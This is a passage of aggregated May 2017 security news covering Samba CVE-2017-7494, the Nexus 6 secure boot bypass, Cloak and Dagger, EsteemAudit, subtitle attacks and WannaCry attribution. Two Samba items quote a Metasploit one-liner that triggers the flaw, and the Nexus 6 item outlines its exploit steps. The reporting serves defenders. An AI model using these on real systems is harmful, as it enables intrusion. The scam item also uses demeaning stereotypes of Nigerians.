“Qakbot’s dynamic polymorphic abilities make it particularly evasive to antivirus systems. This means the virus can more easily maintain its presence without being detected," Patterson said. "It does however need to communicate on the network in order to carry out its dastardly deeds. In the case of Qakbot, it uses HTTPS to communicate with command-and-control (C&C) and FTP to upload stolen data. Network Traffic Analytics can be leveraged against flow data to watch for this one-two punch combination especially where odd FQDNs patterns are detected.”


3 Nigerian Scammers Get 235-Years of Total Jail Sentence in U.S.
26.5.2017 thehackernews  Crime
You may have heard of hilarious Nigerian scams. My all time favourite is this one:
A Nigerian astronaut has been trapped in space for the past 25 years and needs $3 million to get back to Earth, Can you help?
Moreover, Nigerians are also good at promising true love and happiness.
But You know, Love hurts.
Those looking for true love and happiness lost tens of millions of dollars over the Nigerian dating and romance scams.
These criminals spend their whole day trolling the online dating sites for contact emails and then send off hundreds of thousands of fraudulent emails awaiting the victim's response.
A US federal district court in Mississippi has sentenced such three Nigerian scammers to a collective 235 years in prison for their roles in a large-scale international fraud network that duped people out of tens of millions of dollars.
The three Nigerian nationals were part of a 21-member gang of cyber criminals, of which six, including Ayelotan, Raheem, and Mewase, were extradited from South Africa to the Southern District of Mississippi in July 2015 to face charges in the case.
Oladimeji Seun Ayelotan, 30, faces up to 95 years in prison
Rasaq Aderoju Raheem, 31, faces up to 115 years in prison
Femi Alexander Mewase, 45, faces up to 25 years in prison
A federal jury found all of them guilty of offenses involving mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property, the US Department of Justice announced Thursday.
Also, Ayelotan and Raheem were found guilty of conspiracies to commit bank fraud and money laundering, which is why they have been given longer prison sentences.
Until now, the justice department has charged a total of 21 suspects in this case: 12 defendants have already pleaded guilty to charges related to the conspiracy while 11 have been sentenced to date.
The gang has been operating since 2001 and ran a variety of online scams, including romance scams, where the criminals used the false identity of love-struck girlfriends on a dating site to establish a romantic relationship with unsuspecting victims.
Once the gang members gained the victim's trust and affection, they would convince them to carry out their money laundering schemes and launder money from other rackets via MoneyGrams and Western Union, or resend electronics and other goods bought with stolen credit cards to countries where they could be sold for a profit.
The gang members were arrested by South African police in a joint operation with U.S. Immigration and Customs Enforcement's Homeland Security Investigations (HSI) and the U.S. Postal Inspection Service in December 2015.
However, Nigerian scams will never die, and you could be their next victim.


All Android Phones Vulnerable to Extremely Dangerous Full Device Takeover Attack
26.5.2017 thehackrenews Android
Researchers have discovered a new attack, dubbed 'Cloak and Dagger', that works against all versions of Android, up to version 7.1.2.
Cloak and Dagger attack allows hackers to silently take full control of your device and steal private data, including keystrokes, chats, device PIN, online account passwords, OTP passcode, and contacts.
What's interesting about Cloak and Dagger attack?
The attack doesn't exploit any vulnerability in Android ecosystem; instead, it abuses a pair of legitimate app permissions that is being widely used in popular applications to access certain features on an Android device.
Researchers at Georgia Institute of Technology have discovered this attack, who successfully performed it on 20 people and none of them were able to detect any malicious activity.
Cloak and Dagger attacks utilise two basic Android permissions:
SYSTEM_ALERT_WINDOW ("draw on top")
BIND_ACCESSIBILITY_SERVICE ("a11y")
The first permission, known as "draw on top," is a legitimate overlay feature that allows apps to overlap on a device's screen and top of other apps.
The second permission, known as "a11y," is designed to help disabled, blind and visually impaired users, allowing them to enter inputs using voice commands, or listen content using screen reader feature.
Scary Things Hackers Can Do to Your Android (Demo)
Since the attack does not require any malicious code to perform the trojanized tasks, it becomes easier for hackers to develop and submit a malicious app to Google Play Store without detection.
Unfortunately, it’s a known fact that the security mechanisms used by Google are not enough to keep all malware out of its app market.
If you are following regular security updates from The Hacker News, you must be better aware of frequent headlines like, "hundreds of apps infected with adware targeting play store users," and "ransomware apps found on play store."
Just last month, researchers uncovered several Android apps masqueraded as an innocent "Funny Videos" app on Play Store with over 5,000 downloads but distributed the 'BankBot banking Trojan' that steal victims' banking passwords.
Here's what the researchers explained how they got on the Google Play Store to perform Cloak & Dagger attacks:
"In particular, we submitted an app requiring these two permissions and containing a non-obfuscated functionality to download and execute arbitrary code (attempting to simulate a clearly malicious behavior): this app got approved after just a few hours (and it is still available on the Google Play Store)." researchers say.
Once installed, the researchers say the attacker can perform various malicious activities including:
Advanced clickjacking attack
Unconstrained keystroke recording
Stealthy phishing attack
Silent installation of a God-mode app (with all permissions enabled)
Silent phone unlocking and arbitrary actions (while keeping the screen off)
In short, the attackers can secretly take over your Android device and spy on your every activity you do on your phone.
Researchers have also provided the video demonstrations of a series of Cloak and Dagger attacks, which will blow your mind, trust me.


Google Can’t Fix It, At Least Not So Fast
University researchers have already disclosed this new attack vector to Google but noted that since the issue resides in the way Android OS has been designed, involving two of its standard features that behave as intended, the problem could be difficult to resolve.
"Changing a feature is not like fixing a bug," said Yanick Fratantonio, the paper's first author. "System designers will now have to think more about how seemingly unrelated features could interact. Features do not operate separately on the device."
As we reported earlier, Google gives "SYSTEM_ALERT_WINDOW" ("draw on top") permission to all applications directly installed from the official Google Play Store since Android Marshmallow (version 6), launched in October 2015.
This feature that lets malicious apps hijack a device's screen is one of the most widely exploited methods used by cyber criminals and hackers to trick unwitting Android users into falling victims for malware and phishing scams.
However, Google has planned to change its policy in 'Android O,' which is scheduled for release in the 3rd quarter this year.
So, users need to wait for a long, long time, as millions of users are still waiting for Android Nougat (N) from their device manufacturers (OEMs).
In other words, the majority of smartphone users will continue to be victimised by ransomware, adware and banking Trojans at least for next one year.
Temporary Mitigation
The easiest way to disable the Cloak and Dagger attacks in Android 7.1.2 is to turn off the "draw on top" permission by heading on to:
Settings → Apps → Gear symbol → Special access → Draw over other apps.
The universal and easiest way to avoid being hacked is always to download apps from Google Play Store, but only from trusted and verified developers.
You are also advised to check app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.


Terra Privacy Product Uses Dynamic Whitelisting to Block Attacks

26.5.2017 securityweek Safety
Terra Privacy announced on Wednesday a new product that uses dynamic whitelisting to block malware and phishing attacks. A free beta version of the endpoint security product is available for testing.

Terra Privacy was founded by Michael Wood, the cryptographer who designed the REDOC II encryption system. The company’s latest product, Hacker Deterrent Pro, uses dynamically-generated whitelists to ensure that web browsers and other applications only communicate with the servers they are supposed to.

Hacker Deterrent Pro has three main features: Two-Factor Browsing, App Firewall, and DNS Shield.

Two-Factor Browsing ensures that the browser only communicates with trusted domains. To achieve this, the product creates a real-time transient whitelist that contains only the names of webpages opened by the user and the names of other sites from which content is pulled, while any other connection attempt is blocked.

This prevents browser-based threats from communicating with their command and control (C&C) servers, and it can also be used to block commercial trackers.

Traditional whitelisting can be impractical as users have to manually add each website. Hacker Deterrent aims to address this problem by creating transient whitelists that are empty when the web browser is first opened. Each time the user visits a website, that site is automatically added to the whitelist and removed from the whitelist when the page is closed.

This method can also be efficient against sophisticated phishing attacks as Hacker Deterrent Pro will block unauthorized domains even if they look legitimate. The vendor demonstrated its product’s capabilities by showing how it could block phishing sites that use a recently disclosed Unicode-based technique.

According to the company, the solution can also block non-browser Trojans that inject themselves into running processes by preventing them from communicating with domains other than ones belonging to the hijacked app’s developer. For example, the explorer.exe process, which is often targeted by malware, should only be allowed to communicate with Microsoft servers.

The app firewall initially blocks all applications from accessing the Web, and provides information about the app and the host it wants to connect to, allowing users to determine if the connection should be allowed.

The product’s DNS Shield allows users to select DNS servers based on their personal preferences, blocking ISPs from adding their own list of DNS servers. For instance, users can choose DNS servers that reject connections to IPs that are known to host malware.

The beta version of Hacker Deterrent Pro can be tested for free. The commercial version of the product, expected to become available in mid-July, will cost $39.99 per year per endpoint. The solution works on Windows PCs using the Chrome and Firefox web browser.


Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDP (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.”

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly manner as possible. This view is distorted, however, by the UK and US respondents' score at 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is most strong in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.


Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.

Tanium raises $100 million

With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.


Linguistic Analysis Suggests WannaCry Authors Speak Chinese

26.5.2017 securityweek  Ransomware
WannaCry ransom note

A linguistic analysis of more than two dozen ransom notes displayed by the WannaCry ransomware suggests that its authors are fluent Chinese speakers and they also appear to know English.

While malware code similarities suggest that WannaCry has been developed by the North Korea-linked threat actor known as Lazarus, some believe the attack does not fit Pyongyang’s style and interests.

Researchers at threat intelligence firm Flashpoint have analyzed 28 WannaCry ransom notes, including ones written in Chinese (both simplified and traditional), Danish, Dutch, English, French, German, Indonesian, Italian, Japanese, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish, Swedish and Turkish.

The linguistic analysis showed that there are significant differences between the notes written in Chinese and the ones written in other languages. Evidence suggests that the Chinese note, which mostly uses proper grammar, punctuation and syntax, was actually written with a Chinese-language keyboard.

One of the words used in the Chinese note is more common in South China, Hong Kong, Singapore and Taiwan, while another term is more widely used in mainland China.

Experts pointed out that the note written in Chinese includes a significant amount of content that is not present in other versions, and they believe it may have served as the source for the English version.

The English note is also well written, but it contains a major grammar mistake that suggests its author is either not a native speaker or possibly someone who is not well educated.

Flashpoint has determined that the English note has been used to translate the text into other languages using a service such as Google Translate. Tests conducted by researchers show that there is a match of at least 96 percent between the WannaCry notes and Google-translated versions of the English message.

While WannaCry may have been developed by more than one individual, Flashpoint said with high confidence that the Chinese-language ransom note was written by someone who is fluent in Chinese. The English note was written by someone who knows English, but does not appear to be a native speaker, the company said.

“Given these facts, it is possible that Chinese is the author(s)’ native tongue, though other languages cannot be ruled out,” Flashpoint said. “It is also possible that the malware author(s)’ intentionally used a machine translation of their native tongue to mask their identity. It is worth noting that characteristics marking the Chinese note as authentic are subtle. It is thus possible, though unlikely, that they were intentionally included to mislead.”

While security firms such as Symantec and Kaspersky presented evidence linking WannaCry to North Korea, Cybereason questioned the apparent connection, pointing to differences in tactics and the fact that two of the most impacted countries, Russia and China, are North Korea’s biggest allies.

Researchers at Flashpoint are not the only ones who mentioned China. James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, also believes the attack may have been conducted by hackers from China's People's Liberation Army "moonlighting" in their spare time, or freelance Chinese hackers hired by Pyongyang.


Google Patches Nexus 6 Secure Boot Bypass

26.5.2017 securityweek Android
One of the vulnerabilities addressed by Google in its May 2017 security patches allowed the bypass of Nexus 6’s Secure Boot through kernel command-line injection, HCL Technologies researchers reveal.

By exploiting the flaw, an attacker with physical access to the device or one with authorized-ADB/fastboot USB access to the (bootloader-locked) device could gain unrestricted root privileges and “completely own the user space.” For that, the attacker would have to load a tampered or malicious initramfs image.

Security researcher Roee Hay also explains that, because the exploitation doesn’t lead to a factory reset, user data remains intact and still encrypted. The vulnerability is tracked as CVE-2016-10277.

The issue, Hay says, is a continuation of CVE-2016-8467, a High risk vulnerability affecting the Nexus 6/6P bootloader, and which was addressed in Google’s January 2017 security patches. The exploit abused fastboot commands to change the androidboot.mode argument in the kernel command line and was addressed by hardening the bootloader.

“Just before Google released the patch, we had discovered way to bypass it on Nexus 6,” the researcher notes.

Because the fsg-id, carrier and console arguments in Nexus 6’s bootloader can be controlled through the fastboot interface (even if the bootloader is locked), one could pass arbitrary kernel command line arguments if the bootloader didn’t sanitize said three arguments. The researchers also found a series of parameters that can contain arbitrary values and which propagate to the kernel command line.

After previously discovering they could tamper with the bootmode, the researchers focused on finding ways to compromise a device further by inserting arbitrary arguments into the command line. Eventually, they discovered that they could defeat Secure Boot by being able to control a single argument.

The exploit relies on initramfs, a cpio (gzipped) archive that gets loaded into rootfs (a RAM filesystem) during the Linux kernel initialization. The bootloader prepares the kernel command line and initramfs parameters for the Linux kernel in the Device Tree Blob, and then transfers execution to the Linux kernel.

A kernel_init function executes the first userspace process called /init, and a kernel command line argument rdinit can override this default value, but exploitation wasn’t effective, mainly because the Nexus 6 initramfs doesn’t contain a large enough set of binaries, the researcher notes.

“Interestingly, we’ve realized that in arm, it is also possible to control, through a kernel command line argument initrd, the physical address where the initramfs is loaded from by the kernel,” Hay says.

By overriding the default values provided by the bootloader in the Device Tree Blob, the researchers caused the Kernel to crash. Next, they focused on loading their own initramfs archive to the device’s memory, through fastboot.

“Note that the Linux Kernel does not re-verify the authenticity of initramfs, it relies on the bootloader to do that, so if we manage to put a tampered initramfs at the controlled phys_initrd_start physical address, the kernel will indeed populate it into rootfs,” the researcher explains.

Fastboot offers a download mechanism via USB and, because the operation is available even on locked bootloaders, an attacker can abuse it to load a tampered initramfs on the device. The exploit is then successful if the bootloader and Kernel don’t overwrite the data before initramfs is populated into rootfs.

The security researchers created a Proof-of-Concept initramfs and made it publicly available on GitHub. Upon gaining full control of rootfs, an attacker can create a malicious /vendor folder, where firmware images of various SoCs available on the board would normally be saved.

“Kernel drivers usually consume these images upon initialization, and update their SoC counterparts if needed. Hence, the attacker could flash unsigned firmware images. We haven’t checked if there are such, but from our experience with other devices, there are. As for signed ones, downgrade attacks might be possible as well,” Hay says.

Google addressed the issue in the May 2017 set of monthly patches by setting the bootloader to sanitize the fsg-id, carrier and console config arguments.


NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from enSilo firm released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT Exploit.
The WannaCry emergency could not be ended because the NSA dump leaked by the Shadow Brokers team included many other dangerous exploits.

Last months the Shadow Brokers group released another batch of data containing exploit codes still unpatched by Microsoft such as the “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools represents a serious problem, an attacker with technical knowledge can exploit them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit, it is a hacking tool that targets RDP service (port 3389) on machines running no longer supported Microsoft Windows Server 2003 / Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained the security researchers Omri Misgav and Tal Liberman who works for the Ensilo cyber security firm and that developed an unofficial patch for EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn of possible exploitation of EsteemAudit exploit in network wormable threats. threat actors in the wild can develop malware that is able to propagate itself in target’s networks without user’s interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There are many malware in the wild that already infects systems using as attack vector the RDP protocol, (CrySiS, Dharma, and SamSam), the EsteemAudit exploit can potentially make these threats very aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade them to the higher versions to secure themselves from EsteenAudit attacks.
When it is impossible to upgrade the systems it is necessary to secure them, for example disabling RDP port or putting it behind the firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.


Subtitles hack threatens Millions of PCs, Smart TVs, Tablets and Smartphones
26.5.2017 securityaffairs Virus

Security experts from security firm Check Point warn of a subtitles hack threatens Millions of devices.
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.

Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and stream.io.

“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and strem.io. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”

The patch for these vulnerabilities are available for download, users should apply them immediately.

According to the security firm, approximately 200 million video players and streamers are currently exposed to subtitle attack.

“We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years,” continues the analysis. “Hacked in Translation.”

The attackers can craft malicious subtitle files that once executed by a user media player can allow attackers to take complete control over any type of device (i,e, laptops, smart TVs, tablets, and smartphones).

Unlike other attack vectors well known to security firms, this hacking technique is very subtle because subtitles are perceived harmless text files and are not subject to the inspection of security solutions.

subtitles hack infographic_hack_in_translation_v6-1024x946

In subtitles hack, the subtitle can be manipulated by attackers for several malicious purposes.

“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.

Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain control full control of the targeted system.

The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and to gain control of a PC. Similar successful tests allowed the researchers to demonstrate subtitles hack on other players.

Check Point presented a proof of concept attack, says victims are persuaded to visit a malicious website that uses one of the streaming video players, or they are tricked into running a malicious subtitle file on their system that they intentionally downloaded for use with a video.

“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more,” wrote Check Point.

Check Point plans to disclose the technical details of the tests only when software updates will be provided to the users.

Below the list of update currently available:

PopcornTime– Created a Fixed version, however it is not yet available to download in the official website.
The fixed version can be manually downloaded via the following link: https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi– Officialy fixed and available to download on their website. Link: https://kodi.tv/download
VLC– Officially fixed and available to download on their website
Link: http://get.videolan.org/vlc/2.2.5.1/win32/vlc-2.2.5.1-win32.exe
Stremio– Officially Fixed and available to download on their website
Link: https://www.strem.io/


Jury Out on North Korea Link to Ransomware Attack

25.5.2017 securityweek Ransomware

Was North Korea behind the ransomware epidemic that hit global computer networks earlier this month?

That's the subject of heated debate in cybersecurity circles after analysts found similarities in the "WannaCry" worm to other malware attributed to North Korea, including the 2014 hack of Sony Pictures and a cyberheist of millions of dollars from the Bangladesh central bank.

The security firm Symantec this week said the shared code makes it "highly likely" that the attacks were connected to the hacker group given the code name Lazarus, which many believe is North Korean.

Israel-based cybersecurity firm Intezer last week reached a similar conclusion, finding that WannaCry had "strong links to other malware families, believed to be developed by North Korean hackers, or known to be used in attacks against South Korean organizations."

Russian-based security firm Kaspersky Lab and others also pointed to a likely North Korean link.

While the evidence is not conclusive -- hackers can often hide or "spoof" their real identities -- North Korea is emerging as one of the likely suspects despite a strong denial by the Pyongyang envoy to the United Nations, some analysts say.

Symantec researchers said that despite the likely North Korea link, the WannaCry attacks "do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign."

- Desperate for cash -

"I could easily see North Korea doing this as a way to get money," said Paul Benda, a Pentagon and Department of Homeland Security official who is now chief technology officer at Global Security and Innovative Strategies, a Washington consultancy.

"With the sanctions they are under they need cold hard cash."

Other analysts have noted that sanctions squeezing Pyongyang may be prompting desperate actions to raise cash through various channels, including cybercrime.

"While years of sanctions have isolated the Hermit Kingdom from much of the global financial system, North Korea may be seeking to fund the state's coffers through a widespread cybercrime campaign," said FireEye analyst Luke McNamara in a recent post on the Lawfare blog.

Paradoxically, he said, the effort to persuade and other nations to pressure North Korea may be encouraging further cyberattacks: "Pyongyang would be left with few options to compensate for lost income that it could ramp up as quickly as cybercrime."

The attacks discovered last week caused havoc in global computer networks, affecting as many as 300,000 machines in 150 countries and disrupting governments and several industries. The hackers developed the virus to exploit a flaw exposed in leaked documents from the National Security Agency.

- Inconsistencies -

But despite the growing concerns over North Korea, some analysts say it's too soon to point the finger and cite inconsistencies with the Pyongyang connection.

The WannaCry attack appeared unsophisticated: researchers were able to halt the spread with a $10 purchase of a web domain that activated a "kill switch."

And various estimates showed the "ransom" raised amounted to a paltry $116,000 from 302 entities more than a week after computers were locked down.

James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, said WannaCry was "barely functional" and spread widely only because of the large number of networks and computers which failed to upgrade security and were vulnerable to the self-replicating "worm."

The hackers known as Lazarus are a sophisticated cybermercenary group, Scott told AFP. "They use elaborate traps, obfuscation techniques and wipers to eliminate digital footprints. This (WannaCry) has none of that."

More likely, Scott said, is that the attacks were carried out by hackers from China's People's Liberation Army "moonlighting" in their spare time.

Scott, who disputes the widely held belief that the Lazarus group is North Korean, said it is possible that Pyongyang has outsourced some of its cybercrime to these freelance Chinese hackers.

Analysts at Boston-based security firm Cybereason also questions the role of North Korea.

"Nothing in North Korea's past cyber campaigns or in their conventional military and foreign policy fit this mold," the researchers said in a blog.

John Arquilla, chair of defense analysis at the Naval Postgraduate School, said that despite the common patterns in the recent attacks, cyber forensics still have a long way to go to positively identify the source of an attack.

"We are not at the level of CSI," he said, referring to the popular television criminal forensics show. "We have to be very careful about the potential for deception. I would not rush to take military or economically coercive actions on the basis of what might or might not be the truth" on the source of the attacks, Arquilla said.


Samba Patches Code Execution Flaw Introduced in 2010

25.5.2017 securityweek Vulnerebility

The developers of the Samba interoperability software suite announced on Wednesday the availability of security updates that patch a serious remote code execution vulnerability. Researchers have warned that there are many vulnerable systems accessible directly from the Internet.

The flaw, tracked as CVE-2017-7494, affects all versions of Samba since 3.5.0, released in March 2010. The security hole has been addressed in versions 4.6.4, 4.5.10 and 4.4.14, and a workaround has been made available for unsupported versions.

According to Samba maintainers, the vulnerability allows a malicious client to upload a shared library to a writable share, and cause the server to load and execute that file.

The vulnerability exposes various types of systems to attacks, including Linux and network-attached storage (NAS) devices. Rapid7 has warned that many users may not even realize that their systems are running Samba.

Samba provides file and print sharing capabilities between Windows and Unix computers, and it implements many protocols, including SMB, which malicious actors leveraged in the recent WannaCry ransomware attacks. This has led some experts to believe that CVE-2017-7494 could also be exploited for similar worm attacks.

“Unlike SMB, Samba exists on a wide variety of systems from different makers - servers, laptops, home routers, network storage systems, media servers, and many IoT devices. And unlike Windows, those devices may not automatically install an update - even if the manufacturer provides one,” researcher David Longenecker said in a blog post.

Exploiting the vulnerability is easy and proof-of-concept (PoC) code has already been made public, which could lead to in-the-wild attacks. HD Moore, VP of research and development at Atredis, has created a Metasploit module for CVE-2017-7494 and showed how the flaw can be exploited on Ubuntu and a Synology NAS product.

Follow
HD Moore @hdmoore
Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")
8:23 PM - 24 May 2017
231 231 Retweets 243 243 likes
Twitter Ads info & Privacy

A scan conducted by Rapid7 with its Project Sonar showed more than 104,000 Internet-exposed endpoints running a vulnerable version of Samba, and nearly 90 percent of these systems had been running outdated versions of the software.

Individuals and organizations that still use older versions of Samba can prevent attacks by adding the parameter “nt pipe support = no” to the global section of their smb.conf file. RedHat also pointed out that the SELinux security module blocks potential exploits.


CVE-2017-7494 Samba vulnerability, patch your installation now!
25.5.2017 securityaffairs Vulnerebility

A seven-year-old remote code execution vulnerability, tracked as CVE-2017-7494, affects all versions of the Samba software since 3.5.0.
A seven-year-old remote code execution vulnerability affects all versions of the Samba software since 3.5.0. The flaw has been patched by the development team of the project. An attacker can exploit the CVE-2017-7494 RCE to upload a shared library to a writable share, and then cause the server to load and execute it.

The popular CVE-2017-7494 flaw can be easily exploited, just a line of could be used for the hack under specific conditions:

make file- and printer-sharing port 445 reachable on the Internet,
configure shared files to have write privileges.
use known or guessable server paths for those files.
Follow
HD Moore @hdmoore
Re: Samba bug, the metasploit one-liner to trigger is just: simple.create_pipe("/path/to/target.so")
8:23 PM - 24 May 2017
231 231 Retweets 243 243 likes
Twitter Ads info & Privacy
Those requirements include vulnerable computers that (a) make file- and printer-sharing port 445 reachable on the Internet, (b) configure shared files to have write privileges, and (c) use known or guessable server paths for those files. When those conditions are satisfied, remote attackers can upload any code of their choosing and cause the server to execute it, possibly with unfettered root privileges, depending on the vulnerable platform.

“All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.” reads the security advisory issued by Samba.
